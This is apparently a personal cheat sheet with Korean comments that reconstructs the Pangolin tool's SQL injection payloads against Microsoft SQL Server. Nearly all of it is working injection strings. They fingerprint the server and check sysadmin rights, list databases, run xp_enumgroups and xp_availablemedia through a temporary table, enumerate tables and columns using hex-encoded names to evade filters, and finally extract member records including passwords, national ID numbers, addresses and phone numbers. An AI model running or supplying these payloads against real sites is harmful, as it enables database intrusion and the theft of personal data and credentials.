Pangolin(MSSQL)

-Information
--Version : ' and @@version=1--
--Db Name : ' and db_name()=0--
--Server Name : ' and @@servername=0--
--Host Name : ' and host_name()=0--
--System User : ' and system_user=0--
--Current User : ' and user=0--
--Privilege : ' and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar(1))+char(124)=1--
--Databases :
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  1 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  2 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
.
.
.
동일한 응답이 나오면 중단

--Drivers :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),low%20nvarchar(255),high%20nvarchar(255),type%20nvarchar(255));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_availablemedia;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20;drop%20table%20pangolin_test_table;--

--LocalGropus :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),description%20nvarchar(4000));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_enumgroups;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
>
' ;drop table pangolin_test_table;--
' ;create table pangolin_test_table(name nvarchar(255),description nvarchar(4000));--
' ;insert pangolin_test_table exec master.dbo.xp_enumgroups;--
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  1 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  2 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  3 [name],[description] from pangolin_test_table group by


-Data
--Tables(조회)
' and (select cast(count(1) as varchar(10))+char(94) from [sysobjects] where xtype=char(85) and status!=0)=0--
sysobjects의 레코드 중 xtype이 U인 개수 (사용자 테이블 개수)

' and (select top 1 cast(name as varchar(256)) from(select top 1 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 3 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
테이블명 추출

--Columns
' and (select top 1 cast(id as nvarchar(20))+char(124)  from [sysobjects] where name=0x6d0065006d00620065007200)=0--
테이블명(member)을 헥사로 변경(우회)하여 id값을 추출 (from sysobjects)

' and (select cast(count(1) as varchar(10))+char(94) from [syscolumns] where id=549576996)=0--
id값을 가진 모든 column 개수 추출 (from syscolumns)

' and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
각 column의 이름 추출 (from syscolumns)
.
.
.
' and (select top 1 cast(name as varchar(8000)) from (select top 2 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
계속 추출

--Datas
' and (select cast(count(1) as varchar(8000))+char(94) from [member] where 1=1)=0--
해당 테이블(member)의 레코드 수 추출

' and (select top 1
isnull(cast([mem_id] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_pwd] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_name] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_jumin] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_zip] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr1] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr2] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_tel] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_hp] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_email] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_wtday] as nvarchar(4000)),char(32))
from [member] where 1=1 order by [mem_id])=0--
각 레코드의 필드값 알아내기

이어서..